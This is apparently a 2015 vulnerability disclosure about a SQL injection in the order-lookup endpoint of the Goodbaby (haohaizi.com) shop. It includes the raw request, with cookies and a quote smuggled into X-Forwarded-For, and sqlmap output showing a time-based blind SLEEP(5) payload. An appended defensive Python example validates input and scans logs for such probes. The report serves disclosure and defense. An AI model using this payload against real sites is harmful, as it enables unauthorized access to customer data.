2015-06-14: Details have been sent to the vendor and are awaiting the vendor's handling
2015-06-15: Vendor has confirmed; details are disclosed to the vendor only
2015-06-25: Details disclosed to core white hats and experts in the relevant field
2015-07-05: Details disclosed to regular white hats
2015-07-15: Details disclosed to intern white hats
2015-07-30: Details disclosed to the public
Heaven and earth are not benevolent; they treat all things as straw dogs (too many tables involved and it runs slowly, so I did not dump them)
POST data packet:
GET /article-help-getvisitororder.html?t=1434284989451&mode=3&strfield=13800138000 HTTP/1.1
Host: www.haohaizi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.haohaizi.com/article-help-visitororders.html
Cookie: origins=%5B%7B%22utm_source%22%3A%22linktech%22%2C%22utm_medium%22%3A%22cps%22%2C%22utm_term%22%3Anull%2C%22utm_content%22%3Anull%2C%22utm_campaign%22%3Anull%2C%22create_time%22%3A1434284937%2C%22expired_time%22%3A1435494537%2C%22other%22%3A%7B%22adid%22%3A%22shichangcps%22%2C%22cid%22%3A%221636%22%2C%22fbt%22%3A%22A100202883%7C2390474880000E%5E20150614202714-80627%7C99999%7C01%7C%22%7D%7D%5D; vary=77b9f63c97b5ce99c6d26b76c12e347726a340f2657fb48326076630b12a0082; _jzqa=1.897618466894645600.1434284871.1434284871.1434284871.1; _jzqb=1.3.10.1434284871.1; _jzqc=1; _jzqx=1.1434284871.1434284871.1.jzqsr=click%2Elinktech%2Ecn|jzqct=/.-; _jzqckmp=1; __utma=101467934.1657353480.1434284871.1434284871.1434284871.1; __utmb=101467934.2.10.1434284871; __utmc=101467934; __utmz=101467934.1434284871.1.1.utmcsr=linktech|utmccn=(not%20set)|utmcmd=cps; __utmv=101467934.|3=ADID=shichangcps=1; Hm_lvt_53a0d71dba66835ff1aa907db99144d8=1434284872; Hm_lpvt_53a0d71dba66835ff1aa907db99144d8=1434284893; Hm_lvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284875; Hm_lpvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284892; s=43d77f2b115789066d4882150043031e; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; isVisitor=1; user1=10000000; _qzja=1.1084372355.1434284871142.1434284871142.1434284871143.1434284871143.1434284891118..0.0.2.1; _qzjb=1.1434284871142.2.0.0.0; _qzjc=1; _qzjto=2.1.0; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1434284965; loginName=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; UNAME=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; MLV=1; S[MEMBER]=10000000
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
The strfield parameter is injectable (I had tested with my own phone number earlier and did not change it, so I have masked it below; see the screenshot below and the proof of vulnerability for the exact parameters)
12 databases in total
GET parameter 'strfield' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Parameter: strfield (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: t=1434284989451&mode=3&strfield=13800138000' AND (SELECT * FROM (SELECT(SLEEP(5)))zLJp) AND 'Qxdq'='Qxdq
---
[20:42:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[20:42:48] [INFO] fetching database names
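Added example, not code from the original report and not the vendor's code: defender-side checks for the two user-controlled fields the request above shows being injected, the strfield query parameter and the X-Forwarded-For header. It validates strfield as a phone number and binds it as a query parameter against a constructed in-memory SQLite orders table, rejects an X-Forwarded-For value that is not a chain of IP addresses, and scans constructed access-log lines for the time-based blind pattern and the latency spike that a SLEEP(5) probe like the sqlmap payload above produces. The log layout, the phone-number rule, the 4-second threshold, the IPs and every sample value are assumptions.

```python
# Added example, not code from the WooYun report or from haohaizi.com. The log format,
# phone-number rule, threshold and all sample values below are constructed assumptions.
import ipaddress
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Functions used by time-based blind probes; the report's sqlmap payload uses SLEEP(5).
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE)
# Quote and comment characters that a phone-number field should never contain.
SQL_META = re.compile(r"['\"]|--|/\*|#")
# Constructed rule for the lookup field: 11 digits starting with 1 (CN mobile number).
PHONE = re.compile(r"1\d{10}")


def is_valid_phone(value):
    """Allow-list check for strfield; anything that is not a plain phone number is rejected."""
    return PHONE.fullmatch(value) is not None


def parse_forwarded_for(xff):
    """Return the hops of an X-Forwarded-For value as validated IP strings, or None
    if any hop is not a syntactically valid address (a trailing quote fails here)."""
    hops = []
    for part in xff.split(","):
        try:
            hops.append(str(ipaddress.ip_address(part.strip())))
        except ValueError:
            return None
    return hops


def demo_db():
    """Constructed stand-in for the shop's orders table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (order_id TEXT, phone TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?)",
                     [("A1001", "13800138000"), ("A1002", "13900000000")])
    return conn


def lookup_visitor_orders(conn, strfield):
    """Guest order lookup the way the endpoint should do it: validate first, then bind the
    value as a query parameter instead of splicing it into the SQL string."""
    if not is_valid_phone(strfield):
        raise ValueError("strfield must be an 11-digit phone number")
    rows = conn.execute("SELECT order_id FROM orders WHERE phone = ?", (strfield,))
    return [row[0] for row in rows]


# Constructed access-log layout: client, ident, user, [time], "request", status, bytes,
# response time in seconds, "X-Forwarded-For".
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) (?P<rt>\d+(?:\.\d+)?) "(?P<xff>[^"]*)"$'
)


def scan_line(line, slow_threshold=4.0):
    """Return the list of findings for one log line (empty when nothing looks wrong)."""
    m = LOG_LINE.match(line)
    if m is None:
        return ["unparsable line"]
    findings = []
    # parse_qs percent-decodes, so %27 and %20 in the request line become ' and spaces.
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            if TIME_BASED.search(value):
                findings.append(f"time-based payload in {name}")
            elif SQL_META.search(value):
                findings.append(f"SQL metacharacter in {name}")
    xff = m.group("xff")
    if xff not in ("", "-") and parse_forwarded_for(xff) is None:
        findings.append("malformed X-Forwarded-For")
    # A SLEEP(5) probe shows up as a response time well above the endpoint's normal latency.
    if float(m.group("rt")) >= slow_threshold:
        findings.append(f"slow response {m.group('rt')}s")
    return findings


def scan_log(lines, slow_threshold=4.0):
    """Map line index to findings for every line that produced at least one finding."""
    result = {}
    for i, line in enumerate(lines):
        findings = scan_line(line, slow_threshold)
        if findings:
            result[i] = findings
    return result


# Constructed sample log: a normal lookup, a sqlmap-style probe, and a request via a proxy.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jun/2015:20:41:02 +0800] "GET /article-help-getvisitororder.html'
    '?t=1434284989451&mode=3&strfield=13800138000 HTTP/1.1" 200 312 0.08 "-"',
    '203.0.113.5 - - [14/Jun/2015:20:42:40 +0800] "GET /article-help-getvisitororder.html'
    '?t=1434284989451&mode=3&strfield=13800138000%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))zLJp)'
    '%20AND%20%27Qxdq%27=%27Qxdq HTTP/1.1" 200 312 5.02 "8.8.8.8\'"',
    '198.51.100.9 - - [14/Jun/2015:20:43:11 +0800] "GET /article-help-getvisitororder.html'
    '?t=1434284990000&mode=3&strfield=13900000000 HTTP/1.1" 200 298 0.07 "198.51.100.9, 10.0.0.1"',
]

if __name__ == "__main__":
    print(lookup_visitor_orders(demo_db(), "13800138000"))
    for idx, findings in scan_log(SAMPLE_LOG).items():
        print(idx, findings)
```

Run stand-alone it prints the orders for a valid number and the findings for the probe line. The latency check is the one signal that survives payload obfuscation, because the delay is what a time-based blind probe depends on; it only makes sense per endpoint, so the threshold should be set from that endpoint's normal response time rather than a global value.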
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-06-15 17:20
Thank you for your attention to 好孩子 (Goodbaby); we will fix the vulnerability as soon as possible
None yet